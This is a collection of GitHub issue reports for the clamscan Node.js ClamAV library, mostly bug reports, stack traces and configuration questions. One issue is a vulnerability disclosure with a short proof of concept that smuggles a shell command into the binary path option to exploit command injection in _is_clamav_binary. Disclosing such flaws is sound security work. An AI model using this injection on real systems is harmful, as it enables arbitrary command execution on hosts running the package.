Hi. I created a repository based on this repository.

https://github.com/aligoren/clamav-api-server

I mentioned your repository. Do I have anything else to do? Or do you want to give me suggestions?

Thanks for this repository. You did a great thing!

Hi,
I am trying to use the clamscan in the tcp mode and want to write the logs local file, but it works on local mode and not in the server using the tcp mode but logs are not appearing in the log file.
my configuration is, I am trying but don't know what is going on.

@kylefarris it seems like #57 and #58 does not resolve the issue I had described. Below is the stack trace:

Invalid information provided to connect to clamav service. A unix socket or port (+ optional host) is required!
Error: Invalid information provided to connect to clamav service. A unix socket or port (+ optional host) is required!
   at /var/www/production/source/node_modules/clamscan/index.js:1649:29
   at new Promise (<anonymous>)
   at NodeClam.scan_stream (/var/www/production/source/node_modules/clamscan/index.js:1636:16)
   at /var/www/production/source/node_modules/spamscanner/index.js:400:32
   at Array.map (<anonymous>)
   at SpamScanner.getVirusResults (/var/www/production/source/node_modules/spamscanner/index.js:392:26)
   at async Promise.all (index 4)
   at async SpamScanner.scan (/var/www/production/source/node_modules/spamscanner/index.js:1144:9)
   at async MessageSplitter.<anonymous> (/var/www/production/source/index.js:1087:18)

You can reference the source code at https://github.com/spamscanner/spamscanner to see how I implemented it, and let me know maybe if my usage is wrong? This to me seems like a bug with clamscan, since the config passed clearly has the socket defined, and the error message indicates it is instead not defined.

This is most likely from stuff happening in parallel to me it seems at least.

I wanna check for viruses on upload process, and the uploader is sending file to server in chunks.
Can the clamscan package verify the health of a chunk and is it safe to assume, if a chunk of file is healthy, so the whole file would be healthy too?

Hi,

If a timeout occurs when scanning a file in clamdscan mode, the client still waits for the scan to end. It is because in the the client.end() method is called when handling the timeout event on https://github.com/kylefarris/clamscan/blob/master/index.js#L467 instead of calling client.destroy().

I understand the need to still keep waiting for the scan result even if it took too much time, but would it be possible to implement some "hard timeout" option that effectively destroys the socket and throws an error? It would be useful for case when the ClamAV service is saturated and we would postpone the scan, for example.

I am getting this below mentioned error some times on our stage and production server:

Proxy Error

The proxy server received an invalid response from an upstream server.
The proxy server could not handle the request

Reason: Error reading from remote server

We have load balance and multiple app servers behind our VM host.
NOTE: Looking for your valuable input on this issue

We have an microservice endpoint that us using clamscan to connect to a running clamAV container instance. We have had some issues with the running container going down from time to time and in the process of debugging the container, we had issues with the globally instantiated clamscan instance holding on to previous connections and not showing the true state of the container connection (we have a health check endpoint that retrieves the container clamAV version to ensure the container is up an running). Instead of a globally instantiated option, we wanted to create instances when a particular endpoint is hit. However, this causes issues with what I believe to be sockets that are hung up from the previous instance. The first request works just fine, as expected. But I did notice the following log:

node-clam: ClamAV socket has been closed! false

Every subsequent request throws this error:

node-clam: Could not verify the clamdscan binary. [Error: ENOENT: no such file or directory, access 'C:\usr\bin\clamdscan'] {
  errno: -4058,
  code: 'ENOENT',
  syscall: 'access',
  path: 'C:\\usr\\bin\\clamdscan'
}

It tries to fall back to the local binary (we need this to work only with TCP, not local) because it cannot establish a connection following the previous request. I assume, it is because that socket was not closed. Either please point me to the documentation that shows me how to close the socket/destroy an instance or provide the means to do so, in order that it can be used in more than just a global instantiation.

Hi Guys,

First of all, thanks for the brilliant library. It really helped us a lot!

My issue/question/doubt

I understand that the .is_infected (or .scan_file) function takes in the absolute path of the file - which works perfectly fine in local.

But, what if the application has an file-upload feature (<input type="file">). The application obviously can't get the absolute path of the user uploaded file. In that case, how do we pass the filepath to the .is_infected or use another method perhaps ?

It might be a basic question, please bear with me.

Hi,

I'm setting up clamscan to work with a clamd via a TCP socket using the passthrough() stream to check files that are uploaded. It's working fine but while I was testing different error conditions, I was unable to handle the error when the clamd server is not available. No error is thrown, it just logs a message and then waits until it times out.

This is the log message:

node-clam: Error initiating socket to ClamAV:  { Error: connect ECONNREFUSED 127.0.0.1:3310
    at TCPConnectWrap.afterConnect [as oncomplete] (net.js:1106:14)
  errno: 'ECONNREFUSED',
  code: 'ECONNREFUSED',
  syscall: 'connect',
  address: '127.0.0.1',
  port: 3310 }

Here's the basic setup (some parts omitted for brevity):

try {
  let clamScanPromise = new NodeClam().init({
    clamdscan: {
      host: opts.clamavHost, // 127.0.0.1
      port: opts.clamavPort // 3310
    }
  })

  const clamscan = await this.clamScanPromise
  let avStream = clamscan.passthrough();
  avStream.on('error', cb)
  avStream.on('scan-complete', result => {
    // not reached
  })

  let scanPromise = new Promise(resolve => {
    avStream.on('scan-complete', resolve)
  })
  file.stream.pipe(avStream)
  // omitted avStream being piped to s3
} catch (err) {
  // not reached
}

The error seems to originate here in the code and it doesn't look like this error is propagated out in any way. Is there any way to react to the error? It seems like clamscan learns of the error, but my code waits for a timeout. If the server is unavailable, I'd like to reject the request with an error status instead of waiting.

Thanks in advance for the help!

I don't see an API mentioned in documentation that will allow me to pass the byte stream. Only option seems to be file location. Just want to know if there is any way to pass the full byte stream of the file to the scan API.

Note: We don't want to store the file on local before calling scan due to limited size of disk space.

"ERROR: Could not connect to clamd on LocalSocket /var/run/clamd.scan/clamd.sock: Permission denied"

Running this from a directory in the home folder.

Any ideas?

Initializing

    clamScan = await new NodeClam().init({
        debug_mode: true,
        clamdscan: {
            host: config.clamav.host,
            port: config.clamav.port,
            socket: null,
        },
    })

Further access fails with

(node:2119) UnhandledPromiseRejectionWarning: TypeError: Cannot read property 'path' of undefined
    at local_fallback (/Users/vasyas/projects/elpaso/server/node_modules/clamscan/index.js:625:61)
    at Promise (/Users/vasyas/projects/elpaso/server/node_modules/clamscan/index.js:674:24)
    at Promise._execute (/Users/vasyas/projects/elpaso/server/node_modules/bluebird/js/release/debuggability.js:313:9)

Can someone help to on why I am getting below error while using clamdscan though clamscan working fine.

Error: Error: Command failed: /usr/local/bin/clamdscan --no-summary --fdpass --config-file=/usr/local/etc/clamav/clamd.conf --multiscan /Users/xxxxx/POC/dog.jpeg

Below is test code I am using

var clam = require('clamscan')({
  remove_infected: false, // If true, removes infected files
  quarantine_infected: false, // False: Don't quarantine, Path: Moves files to this place.
  scan_log: null, // Path to a writeable log file to write scan results into
  debug_mode: false, // Whether or not to log info/debug/error msgs to the console
  file_list: null, // path to file containing list of files to scan (for scan_files method)
  scan_recursively: true, // If true, deep scan folders recursively
  clamscan: {
    path: '/usr/local/bin/clamscan', // Path to clamscan binary on your server
    db: null, // Path to a custom virus definition database
    scan_archives: true, // If true, scan archives (ex. zip, rar, tar, dmg, iso, etc...)
    active: true, // If true, this module will consider using the clamscan binary,
    multiscan: true
  },
  clamdscan: {
    path: '/usr/local/bin/clamdscan', // Path to the clamdscan binary on your server
    config_file: '/usr/local/etc/clamav/clamd.conf', // Specify config file if it's in an unusual place
    multiscan: true, // Scan using all available cores! Yay!
    reload_db: false, // If true, will re-load the DB on every call (slow)
    active: true // If true, this module will consider using the clamdscan binary
  },
  preference: 'clamdscan' // If clamdscan is found and active, it will be used by default
});

clam.is_infected('/Users/xxxxx/POC/dog.jpeg', function(err, file, is_infected) {
  if(err) {
    console.log(err);
    return false;
  }

  if(is_infected) {
    console.log({msg: "File is infected!"});
  } else {
    console.log({msg: "File is clean!"});
  }
});

Hello,

calling get_version() throws

{
cmd: "/usr/bin/clamscan --no-summary --stdout --remove=no --scan-archive=yes -r --version",
code: "ENOENT", 
errno: "ENOENT",
path: "/usr/bin/clamscan --no-summary --stdout --remove=no --scan-archive=yes -r --version",
spawnargs: [],
stderr: "",
stdout: "",
syscall: "spawn /usr/bin/clamscan --no-summary --stdout --remove=no --scan-archive=yes -r --version"
}

After digging in I found out that the error originates in index.js

I got it to work by changing it to

...
try {
                    const {stdout, stderr} = await cp_exec(command);
...

Is there I am doing something wrong when calling it?

When I initialize a NodeClam with a custom binary and config file for clamdscan, the scanner verification process does not respect the custom config file setting.

Here's my call to init:

const clamscan = await new NodeClam().init({
    clamdscan: {
      path: '/opt/bin/clamdscan',
      config_file: '/opt/etc/myapp.conf',
      active: true,
    },
    preference: 'clamdscan',
    debug_mode: true,
  });

and here's the logger output:

node-clam: Could not verify the clamdscan binary. Error: Command failed: /opt/bin/clamdscan --version
ERROR: Can't parse clamd configuration file /opt/etc/clamd.conf

    at ChildProcess.exithandler (child_process.js:308:12)
    at ChildProcess.emit (events.js:314:20)
    at ChildProcess.EventEmitter.emit (domain.js:483:12)
    at maybeClose (internal/child_process.js:1022:16)
    at Process.ChildProcess._handle.onexit (internal/child_process.js:287:5)
    at Process.callbackTrampoline (internal/async_hooks.js:126:14) {
  killed: false,
  code: 2,
  signal: null,
  cmd: '/opt/bin/clamdscan --version',
  stdout: '',
  stderr: "ERROR: Can't parse clamd configuration file /opt/etc/clamd.conf\n"
}

As you can see, clamdscan is still looking for /opt/etc/clamd.conf (what I believe is the default config file location, and which doesn't exist in my environment) instead of the custom file I provided, /opt/etc/myapp.conf. The binary itself has been correctly overridden to the value I provided in init.

I believe the behavior comes from the _is_clamav_binary function in index.js

async _is_clamav_binary(scanner) {
        const path = this.settings[scanner].path || null;
        if (!path) {
            if (this.settings.debug_mode) console.log(`${this.debug_label}: Could not determine path for clamav binary.`);
            return false;
        }

       // Right here
       // vvvvvvvvvvvv
        const version_cmds = {
            clamdscan: `${path} --version`,
            clamscan: `${path} --version`,
        };
       // ^^^^^^^^^^^^^^

        try {
            await fs_access(path, fs.constants.R_OK);
            const version_cmds_exec = version_cmds[scanner].split(' ');
            const {stdout} = await cp_execfile(version_cmds_exec[0], [version_cmds_exec[1]]);
            if (stdout.toString().match(/ClamAV/) === null) {
                if (this.settings.debug_mode) console.log(`${this.debug_label}: Could not verify the ${scanner} binary.`);
                return false;
            }
            return true;
        } catch (err) {
            if (this.settings.debug_mode) console.log(`${this.debug_label}: Could not verify the ${scanner} binary.`, err);
            return false;
        }
    }

The version_cmds commands do not include a -c/--config-file option, and my log output suggests that clamdscan still requires a working config file even just to run --version.

Can the package be modified to use the custom config file during scanner verification? I could take on this task if necessary.

needs to add the proper regex to get the name of the virus (if the file is infected)

Vulnerability Description

Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands as part of the _is_clamav_binary function located within Index.js.

It should be noted that this vulnerability requires a pre-requisite that a folder should be created with the same command that will be chained to execute. This lowers the risk of this issue.

POC

var Root = require("clamscan"); 
var fs = require("fs"); 
var attack_code = "echo vulnerable > create.txt"; 
var root = new Root(); 
fs.mkdir(attack_code + "&", function(){}); 
root.init({"clamscan": {'path': attack_code + "&"}});

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

while scanning single file, I'm getting this error.

var clam = require('clamscan');
 clam.is_infected('./upload/' + req.files[0].originalname, function(err, file, is_infected) {
            if (err) {
                console.log(err);
                return false;
            }

            if (is_infected) {
                virus_detected = true;
                res.send({ msg: "File is infected! upload blocked.!" });
            }
            else{
//some goes here
}
});

Hi, nice repo

Any plans to add a docker image ready to use with the API and clamav binary inside?

https://travis-ci.org/kylefarris/clamscan/jobs/84028001

Also the Node.js versions used on CI are a bit outdated.
We should test against 6, 8, 10 and 11.

Hey,

currently i'm building a node express server which is currently just running locally. When i try to scan a file / folder it always resolves into an error:

----------- SCAN SUMMARY -----------
Infected files: 0
Total errors: 1
Time: 0.000 sec (0 m 0 s)
Start Date: 2021:09:21 16:45:55
End Date: 2021:09:21 16:45:55
FAIL: 2

cmd: /usr/local/bin/clamdscan --no-summary --fdpass --remove --config-file=./config/clamd.dev.conf --multiscan ./clamav/test.png'

Using MacOS Big Sur

Any experience on this and how i can fix this for local testing? Thanks in advance :)

Hi,

Wondering if this has ever cropped up before:

If you were to run the example is_infected code on the repo page, and ClamAv was to produce a single warning in it's output the file been checked would be assumed to be clean without it looking at the scanning result from stdout.

This is because if any warnings are raised they are received on stdErr. Resulting in line 216 been invoked:

return callback(err, '', null);   ** Note:  err === null, if the error comes from stderr  **

Following through to the example on the main repo page. 'File is clean' would be returned.

clam.is_infected('/a/picture/for_example.jpg', function(err, file, is_infected) {
if(err) {
console.log(err);
return false;
}
if(is_infected) {
res.send({msg: "File is infected!"});
} else {
res.send({msg: "File is clean!"});
}
});

Thanks
Rich.

When I try to build my Laravel project with clamscan running npm run dev, i get an error:

Module not found: Error: Can't resolve 'child_process'.

So i put in webpackconfig this:
node: {
child_process: 'empty'
}

and i get another error:

Module not found: Error: Can't resolve 'fs'.

Then i put in webpackconfig:

node: {
child_process: 'empty',
fs: 'empty'
}

and i get the error:
fs.existsSync is not a function

please tell me whats is going on, and what i have to do

After trying to check directory got this error

viruses = Array.from(new Set(viruses));
TypeError: Assignment to constant variable.

And after some investigation, I found an issue in scan_files method.

line 1087

let viruses = [];

line 1093

const viruses = stdout.trim().split(String.fromCharCode(10)).map(v => /FOUND\n?$/.test(v) ? v.replace(/(.+):\s+(.+)FOUND\n?$/, "$2").trim() : null).filter(v => !!v);

line 1119

viruses = Array.from(new Set(viruses));

A pretty easy solution will be to rename a variable in the line 1093

I'm using the default config, the only changes are to the clamdscan config_file and scan_recursively which is set to false so I can get the lists with good / bad files.
This is the error that I get:

/var/www/aws-cleaner/node_modules/clamscan/index.js:535
                        if (info.isFile()) good_files.push(file);
                                ^

TypeError: Cannot read property 'isFile' of undefined
    at /var/www/aws-cleaner/node_modules/clamscan/index.js:535:33
    at FSReqWrap.oncomplete (fs.js:82:15)

It works fine using the other 'option' to get the 2 lists with good/bad files, using a file_cb function and scan_recursively set to true.

Right now within the is_infected method if the clam scan fails there is no way to know the exact error from the daemon

It seems like this error occurs if clamscan init is being called in parallel, which would mean that the promise is not being shared, and false information being returned.

 Error (NodeClamError) {
    data: {},
    date: Date 2020-08-12 01:02:33 797ms UTC {},
    message: 'No valid & active virus scanning binaries are active and available and no host/socket option provided!',
  }

https://travis-ci.com/github/spamscanner/spamscanner/builds/179356176

Related to #55

I was trying to run a scan using my node app, during the callback I got an error as follow

ERROR: Communication error

So I tried to run the scan manually, the error message is
ERROR: Could not lookup : Servname not supported for ai_socktype

The command used for run is:
clamdscan --no-summary --fdpass --config-file=/etc/clamav/clamd.conf /home/ubuntu/testing/up/testing12324

Anyone encountered this before?
Thank you :)

The result of doesn't return arrays of good files and bad files.
It returns an array with the path scanned.

What do you think about support scan using tcp socket?

Using latest version of clamscan, I am getting the following error when I try to load a 3.8 GB file.

node-clam: Provided stream is readable.
node-clam: Attempting to establish socket/TCP connection for "scanStream"
node-clam: using local unix domain socket: /var/run/clamav/clamd.ctl
internal/buffer.js:69
throw new ERR_OUT_OF_RANGE('value', range, value);
^

RangeError [ERR_OUT_OF_RANGE]: The value of "value" is out of range. It must be >= -2147483648 and <= 2147483647. Received 3875796802
at checkInt (internal/buffer.js:69:11)
at writeU_Int32BE (internal/buffer.js:799:3)
at Buffer.writeInt32BE (internal/buffer.js:887:10)
at NodeClamTransform._transform (/home/repo-l2/Documents/projects/ge-clam/node_modules/clamscan/lib/NodeClamTransform.js:44:14)
at NodeClamTransform.Transform._read (internal/streams/transform.js:205:10)
at NodeClamTransform.Transform._write (internal/streams/transform.js:193:12)
at writeOrBuffer (internal/streams/writable.js:358:12)
at NodeClamTransform.Writable.write (internal/streams/writable.js:303:10)
at Readable.ondata (internal/streams/readable.js:726:22)
at Readable.emit (events.js:375:28) {
code: 'ERR_OUT_OF_RANGE'
}

Trying to upload a file with space in the file name, it's throwing this error 'Could not find file to scan!'
After investigation, found that it is replacing the spaces with '\ '
After that it is failing at fs_access function.

Hi there,

get_version() function does not return reject in case of error

I think that it should be return (has_cb ? cb(err, null) : reject(err));

Hello,
I found a bug when i'm trying to use scan_files without file_cb parameter:

clam.scan_files(files, function(err, good_files, bad_files) {});

This was printed to console:
if(this.settings.debug_mode === true)
^
TypeError: Cannot read property 'debug_mode' of undefined
at home/user/dev/node_modules/clamscan/index.js:262:22

After i had correted this, it was printed:
return end_cb(err, path, null);
^
ReferenceError: path is not defined
at home/user/dev/node_modules/clamscan/index.js:264:25

When using node 16 the following code fails with
Error [ERR_MULTIPLE_CALLBACK]: Callback called multiple times
It does not happen on node 14.

It seems to be a problem with the highWaterMark. When it is low enough, it works.

const fs = require('fs');
const NodeClam = require('clamscan');

const {Writable} = require('stream');

class MyWritable extends Writable {
constructor(options) {
super(options);
}
_write(chunk, encoding, callback) {
// console.log("xxxxxx", arguments);
callback();
}
}

async function test() {
const source = fs.createReadStream('./README.md', {highWaterMark: 512});
const clamscan = await new NodeClam().init({clamdscan: {host: 'localhost', port: 3310}, debugMode: true});
const av = clamscan.passthrough();
av.on('finish', () => {console.log('--------------av finished');});
av.on('error', (error) => {console.log('--------------av error', error);});
av.on('scan-complete', (result) => {console.log('--------------av scan-complete', result);});
const mywritable = new MyWritable();
mywritable.on('error', (error) => {console.log('--------------mw error', error);});
mywritable.on('finish', () => {console.log('--------------mv finished');});
source.pipe(av).pipe(mywritable).on('finish', () => {console.log('all done', arguments);});
}

test();

Describe the bug

I'm implementing a function that receives a file URL, creates a readable stream with axios, and then pipes that stream to clamscan with the passthrough method. However, I always receive COMMAND READ TIMED OUT in the debug logs and is_infected is null. It usually takes around 3 minutes to respond.

Code to reproduce

This is the simplified code.

const nodeClam = new NodeClam()
const clam = await nodeClam.init(clamScanOptions)

const scanRemoteFile = async (url: string): Promise<ScanResult> => {
  let fileStream: ReadStream
  try {
    // Get a readable stream from this URL
    const res = await axios({
      method: 'GET',
      url,
      responseType: 'stream',
    })
    fileStream = res.data
  } catch (e) {
    console.error(e)
  }
  
  // Send output of this file stream to ClamAV
  const av = clam.passthrough()
  fileStream.pipe(av)

  return new Promise((resolve, reject) => {
    av.on('scan-complete', (result) => {
      resolve(result)
    })
    // other listeners
  })
}

Debug logs

node-clam: DEBUG MODE ON
node-clam: Could not verify the clamdscan binary. [Error: ENOENT: no such file or directory, access '/usr/bin/clamdscan'] {
  errno: -2,
  code: 'ENOENT',
  syscall: 'access',
  path: '/usr/bin/clamdscan'
}
node-clam: Could not verify the clamscan binary. [Error: ENOENT: no such file or directory, access '/usr/bin/clamscan'] {
  errno: -2,
  code: 'ENOENT',
  syscall: 'access',
  path: '/usr/bin/clamscan'
}
node-clam: Initially testing socket/tcp connection to clamscan server.
node-clam: using remote server: xxx.xxx.xxx.xxx:3310
node-clam: Established connection to clamscan server!
node-clam: PONG!
node-clam: Established connection to clamscan server!
node-clam: Socket/Host connection closed.
node-clam: using remote server: xxx.xxx.xxx.xxx:3310
node-clam: ClamAV Socket Initialized...
node-clam: Doing initial transform!
node-clam: Got result! COMMAND READ TIMED OUT

node-clam: Error Response:  COMMAND READ TIMED OUT
node-clam: File may be INFECTED!
node-clam: Processed Result:  {
  is_infected: null,
  viruses: [],
  file: null,
  resultString: 'COMMAND READ TIMED OUT'
} COMMAND READ TIMED OUT

node-clam: ClamAV socket has received the last chunk!
node-clam: Error Response:  COMMAND READ TIMED OUT
node-clam: File may be INFECTED!
node-clam: Result of scan: {
  is_infected: null,
  viruses: [],
  file: null,
  resultString: 'COMMAND READ TIMED OUT'
}
node-clam: It took false seconds to scan the file(s).

Expected behavior

Files can be scanned normally.

Other information

• clamscan: v1.3.3
• docker-clamav: ClamAV 0.102.4/26090/Wed Feb 24 12:09:42 2021 that comes with this image mkodockx/docker-clamav@sha256:498cc6f2d2b56974f1cdcb8e15267cc736576f960ce99ce862b7b82ff7aa6a4d (sorry I retagged the image so I lost the original tag, but still have this hash and it's pullable from Docker Hub).

Scanning an infected file by using 'is_infected' worked well. But there is uncaught error when using passthrough.
W20200120-14:47:30.649(8)? (STDERR) events.js:183
W20200120-14:47:30.650(8)? (STDERR) throw er; // Unhandled 'error' event
W20200120-14:47:30.650(8)? (STDERR) ^
W20200120-14:47:30.650(8)? (STDERR)
W20200120-14:47:30.650(8)? (STDERR) Error: stream.push() after EOF
W20200120-14:47:30.650(8)? (STDERR) at readableAddChunk (_stream_readable.js:240:30)
W20200120-14:47:30.650(8)? (STDERR) at NodeClamTransform.Readable.push (_stream_readable.js:208:10)
W20200120-14:47:30.651(8)? (STDERR) at NodeClamTransform.Transform.push (_stream_transform.js:147:32)
W20200120-14:47:30.651(8)? (STDERR) at NodeClamTransform._flush (/npm/node_modules/clamscan/NodeClamTransform.js:38:14)
W20200120-14:47:30.651(8)? (STDERR) at NodeClamTransform.prefinish (_stream_transform.js:137:10)
W20200120-14:47:30.651(8)? (STDERR) at emitNone (events.js:106:13)
W20200120-14:47:30.651(8)? (STDERR) at NodeClamTransform.emit (events.js:208:7)
W20200120-14:47:30.651(8)? (STDERR) at prefinish (_stream_writable.js:602:14)
W20200120-14:47:30.651(8)? (STDERR) at finishMaybe (_stream_writable.js:610:5)
W20200120-14:47:30.651(8)? (STDERR) at endWritable (_stream_writable.js:621:3)
W20200120-14:47:30.651(8)? (STDERR) at NodeClamTransform.Writable.end (_stream_writable.js:572:5)
W20200120-14:47:30.652(8)? (STDERR) at NodeClamTransform.Duplex._destroy (_stream_duplex.js:118:8)
W20200120-14:47:30.652(8)? (STDERR) at NodeClamTransform.Transform._destroy (_stream_transform.js:196:29)
W20200120-14:47:30.652(8)? (STDERR) at NodeClamTransform.destroy (internal/streams/destroy.js:32:8)
W20200120-14:47:30.652(8)? (STDERR) at handle_error (/npm/node_modules/clamscan/index.js:927:44)

We were trying to catch startup errors in the init method but not seeing them. Thanks to our team member @saijian2008, we found the problem is index.js:571. It should use reject not resolve, i.e.:

return (has_cb ? cb(err, false) : reject(err));

It's a bit too soon to be requiring this version--especially since the reason for requiring it is not entirely necessary.

Is there any way to scan an input stream instead of a file?

When running clamscan inside clamav docker container (Alpine based), it is giving error.

Steps to reproduce

• Create Docker file

FROM clamav/clamav:unstable_base
WORKDIR /usr/src/app
COPY . .
RUN apk --no-cache add --virtual native-deps \
    bash g++ gcc libgcc libstdc++ linux-headers make \
    --update nodejs npm 
EXPOSE 3000

• Create DockerCompose file

version: "3.2"
services:
  #=================================================================
  # ClamAV for Virus Scanning
  #=================================================================
  clamav:
    build: .
    container_name: clamav
    volumes:
      - clam-db:/var/lib/clamav
      - scandir:/usr/src/app/scandir
      - express-app:/usr/src/app
      - express-app\node_modules:/usr/src/app/node_modules
    ports: 
      - 3000:3000

• NodeJs App

const NodeClam = require('clamscan');

async function startScan() {
  try {
      const clamscan = await new NodeClam().init();
      const {good_files, bad_files} = await clamscan.scan_dir(`${process.cwd()}/scandir`);
      console.log("🚀 ~ file: app.js ~ startScan ~ good_files", good_files)
      console.log("🚀 ~ file: app.js ~ startScan ~ bad_files", bad_files)
  } catch (err) {
      console.log("🚀 ~ file: app.js ~ startScan ~ err", err)
  }
}

startScan();

Error

Error: spawn /usr/bin/clamdscan --no-summary --fdpass --multiscan /usr/src/app/scandir ENOENT
    at parse_stdout (/usr/src/app/node_modules/clamscan/index.js:1221:87)
    at /usr/src/app/node_modules/clamscan/index.js:1239:37
    at exithandler (child_process.js:397:5)
    at ChildProcess.errorhandler (child_process.js:409:5)
    at ChildProcess.emit (events.js:400:28)
    at Process.ChildProcess._handle.onexit (internal/child_process.js:275:12)
    at onErrorNT (internal/child_process.js:467:16)
    at processTicksAndRejections (internal/process/task_queues.js:82:21)
    at emitUnhandledRejectionWarning (internal/process/promises.js:168:15)
    at processPromiseRejections (internal/process/promises.js:247:11)
    at processTicksAndRejections (internal/process/task_queues.js:96:32)
(node:183) Error: Error: spawn /usr/bin/clamdscan --no-summary --fdpass --multiscan /usr/src/app/scandir ENOENT
    at parse_stdout (/usr/src/app/node_modules/clamscan/index.js:1221:87)
    at /usr/src/app/node_modules/clamscan/index.js:1239:37
    at exithandler (child_process.js:397:5)
    at ChildProcess.errorhandler (child_process.js:409:5)
    at ChildProcess.emit (events.js:400:28)
    at Process.ChildProcess._handle.onexit (internal/child_process.js:275:12)
    at onErrorNT (internal/child_process.js:467:16)
    at processTicksAndRejections (internal/process/task_queues.js:82:21)
(node:183) [DEP0018] DeprecationWarning: Unhandled promise rejections are deprecated. In the future, promise rejections that are not handled will terminate the Node.js process with a non-zero exit code.
    at emitDeprecationWarning (internal/process/promises.js:180:11)
    at processPromiseRejections (internal/process/promises.js:249:13)
    at processTicksAndRejections (internal/process/task_queues.js:96:32)

I think that the issue with clamdscan and scan_recursively is not entirely fixed or I didn't understood right what needs to output. Now it works, but only shows the files that are directly in that folder, the ones that are in subfolders are not shown, they are not even scanned.

I wonder if this is supported? Users will upload base64 image strings and the string could be a malware in disguise. Thanks

Tue May 19 00:23:11 2020 -> !Failed to load new database: Malformed database
Tue May 19 00:23:12 2020 -> ^Database load exited with "Test failed" (8)
Tue May 19 00:23:12 2020 -> !Database test FAILED.
Tue May 19 00:23:12 2020 -> !Unexpected error when attempting to update database: daily
Tue May 19 00:23:12 2020 -> ^fc_update_databases: fc_update_database failed: Test failed (8)
Tue May 19 00:23:12 2020 -> !Database update process failed: Test failed (8)
Tue May 19 00:23:12 2020 -> !Update failed.

For installation, do you need to install ClamAV on to a local machine or server?

If you try to scan folders with more than 4k files there's a chance to get an error like this There was an error! Error: stdout maxBuffer exceeded., this is because nodejs's buffer is set to 200*1024 bytes.
It would be nice to have a way to control this, without hacking the code inside the module.

I am trying out the passthrough() example but unfortunately I am getting this

TypeError: clamscan.passthrough is not a function

I am initializing the connection options as

const clamscan = new NodeClam().init({
    clamdscan: {
        host: '127.0.0.1',
        port: 3310,
    }
});

as I am running the clamav service in a docker container (telnet 127.0.0.1 3310 works btw).

Ideas?

When checking the availability of the clamd service if socket or host/port are provided, the following code in index.js is executed: client.write('PING!');, expecting a response back: PONG.

However, the current version of clamd is looking for a PING command without the exclamation point. Hence, clamd seems to reject this as an "UNKNOWN COMMAND". Running the current test suite, we can see the following error in the debug logs each time:

Fri Sep 13 10:03:23 2019 -> Command PING has trailing garbage!
Fri Sep 13 10:03:23 2019 -> got command PING! (5, 0), argument:
Fri Sep 13 10:03:23 2019 -> Receive thread: closing conn (FD 9), group finished
Fri Sep 13 10:03:23 2019 -> Consumed entire command